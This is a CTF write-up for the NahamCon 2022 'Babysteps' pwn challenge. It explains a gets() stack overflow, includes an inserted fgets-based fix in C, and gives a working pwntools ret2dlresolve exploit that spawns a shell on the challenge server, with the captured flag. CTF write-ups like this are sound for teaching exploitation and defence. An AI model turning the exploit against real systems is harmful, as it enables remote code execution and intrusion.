Tags: bof pwn ret2dlresolve 

NahamCon CTF 2022

Babysteps

Become a baby! Take your first steps and jump around with BABY SIMULATOR 9000!

Author: @JohnHammond#6971

babysteps babysteps.c

Tags: pwn x86 bof remote-shell ret2dlresolve

Summary

Embryo pwn featuring gets.

From man gets:

BUGS

Never use gets(). Because it is impossible to tell without knowing the data
in advance how many characters gets() will read, and because gets() will
continue to store characters past the end of the buffer, it is extremely
dangerous to use. It has been used to break computer security. Use fgets()
instead.

Analysis

Checksec

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

No mitigations, basically choose your own adventure.

I went with ret2dlresolve because I'm lazy and the code is identical for most gets challenges.

Ghidra Decompile

void ask_baby_name(void)
{
  char local_1c [20];
  
  puts("First, what is your baby name?");
  gets(local_1c);
  return;
}

gets is the vulnerability, and with no mitigations in play there are numerous ways to solve this.

local_1c sits 0x1c bytes below the saved return address (the address in main that ask_baby_name returns to), so the buffer is the first thing gets overruns on its way to the frame's return slot. To exploit, write 0x1c bytes of padding followed by your payload.
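The fix the gets man page points at is a bounded read. The following is an added example, not part of the original write-up or the challenge source: it replaces the gets call in ask_baby_name with fgets into the same 20-byte buffer, strips the newline, and drains any leftover input from an over-long line so the excess cannot spill into the next read. The function names read_baby_name, read_name_from_string and count_names_in_string are assumptions chosen for this example; the sample inputs are constructed. fmemopen (POSIX) is used only to feed strings to the reader for testing.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Same size as local_1c in the decompiled ask_baby_name(). */
#define NAME_LEN 20

/* Hardened replacement for the gets() call (hypothetical name).
 * Reads at most buflen-1 bytes from `in` into buf, always NUL-terminates,
 * removes the trailing newline, and returns the stored length, or -1 on
 * EOF/error. If the line was longer than the buffer, the remainder of the
 * line is consumed so it does not bleed into the next read. */
int read_baby_name(FILE *in, char *buf, size_t buflen)
{
    if (buf == NULL || buflen == 0)
        return -1;
    if (fgets(buf, (int)buflen, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {
        buf[n] = '\0';             /* whole line fit: drop the newline */
    } else {
        int c;                     /* line truncated: discard the rest of it */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Test helper (hypothetical): read one name from a constructed string. */
int read_name_from_string(const char *input, char *buf, size_t buflen)
{
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -1;
    int r = read_baby_name(f, buf, buflen);
    fclose(f);
    return r;
}

/* Test helper (hypothetical): count how many names a constructed input
 * yields when read repeatedly with a buffer of `buflen` bytes. An over-long
 * line must still count as exactly one name thanks to the drain above. */
int count_names_in_string(const char *input, size_t buflen)
{
    char buf[64];
    if (buflen > sizeof buf)
        buflen = sizeof buf;
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -1;
    int count = 0;
    while (read_baby_name(f, buf, buflen) >= 0)
        count++;
    fclose(f);
    return count;
}

/* Drop-in for the original function: same prompt, bounded read. */
void ask_baby_name_safe(void)
{
    char name[NAME_LEN];
    puts("First, what is your baby name?");
    if (read_baby_name(stdin, name, sizeof name) >= 0)
        printf("Hello, %s!\n", name);
}

int main(void)
{
    ask_baby_name_safe();
    return 0;
}
```

With a 20-byte buffer the reader keeps at most 19 characters; anything beyond that on the same line is discarded rather than written past the end of the array, which is exactly the behaviour gets cannot provide.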

Exploit

#!/usr/bin/env python3

from pwn import *

binary = context.binary = ELF('./babysteps', checksec=False)

# pwntools builds the ret2dlresolve structures for system("sh")
rop = ROP(binary)
dl = Ret2dlresolvePayload(binary, symbol='system', args=['sh'])

# chain: gets() the dlresolve data into a writable address, then resolve+call
rop.gets(dl.data_addr)
rop.ret2dlresolve(dl)

if args.REMOTE:
    p = remote('challenge.nahamcon.com', 31127)
else:
    p = process(binary.path)

payload  = b''
payload += 0x1c * b'A'      # padding up to the saved return address
payload += rop.chain()
payload += b'\n'            # ends the first gets() read
payload += dl.payload       # consumed by the second gets() in the chain

p.sendlineafter(b'name?\n', payload)
p.interactive()

Google ret2dlresolve or read some of my other write-ups for details.

Output:

# ./exploit.py REMOTE=1
[*] Loaded 10 cached gadgets for './babysteps'
[+] Opening connection to challenge.nahamcon.com on port 31127: Done
[*] Switching to interactive mode
$ cat flag.txt
flag{7d4ce4594f7511f8d7d6d0b1edd1a162}
Original writeup (https://github.com/datajerk/ctf-write-ups/tree/master/nahamconctf2022/babysteps).